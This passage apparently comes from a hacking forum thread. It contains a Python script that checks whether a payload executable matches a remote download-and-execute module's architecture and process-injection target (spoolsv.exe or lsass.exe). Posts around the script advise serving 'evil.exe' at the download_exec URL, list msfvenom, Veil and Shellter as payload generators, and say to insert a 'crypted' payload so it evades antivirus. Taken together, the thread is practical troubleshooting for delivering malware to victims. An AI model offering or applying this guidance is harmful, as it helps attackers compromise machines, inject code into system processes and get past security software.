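    """Return a list of problems; an empty list means the combination is consistent."""
    try:
        arch = pe_arch(exe)
    except ValueError as err:
        return [f"payload is not a usable PE image: {err}"]
    problems = []
    if arch != target_architecture:
        problems.append(f"payload is {arch} but TARGETARCHITECTURE is {target_architecture}")
    if pe_is_dll(exe):
        problems.append("payload file is a DLL; a download-and-run delivery expects an EXE")
    # Hint taken from the module's own option description: spoolsv.exe for x86, lsass.exe for x64
    if target_architecture == "x64" and process_inject.lower() == "spoolsv.exe":
        problems.append("PROCESSINJECT is spoolsv.exe; the module says to use lsass.exe for x64")
    return problems


def build_fake_pe(machine: int, characteristics: int = 0x0102) -> bytes:
    """Constructed minimal header-only image for testing: MZ stub, PE signature, IMAGE_FILE_HEADER."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew -> right after the stub
    file_header = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b"PE\0\0" + file_header


def main(argv: list) -> int:
    if len(argv) != 4:
        print(f"usage: {argv[0]} <payload.exe> <TARGETARCHITECTURE x86|x64> <PROCESSINJECT>")
        return 2
    with open(argv[1], "rb") as fh:
        problems = check_delivery(fh.read(), argv[2], argv[3])
    for problem in problems:
        print("[-]", problem)
    if not problems:
        print("[+] payload architecture matches the module options")
    return 1 if problems else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

    Run it as `python3 check_payload.py evil.exe x86 spoolsv.exe` against the file you serve at the download_exec URL; the same check applies to anything produced by msfvenom, Veil or Shellter, since those tools will happily emit a 64-bit file for a 32-bit target if asked.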
  11. UrfinJuice (New Member)

    Dear moderators, maybe it would be better to rename the topic, since the essence of the question has changed a bit? Now the problem is that specific payloads do not work...
     
  12. h3xp1017 (Member)

    show advanced

    there will be something like EXE::Path, stuff your crypted one in there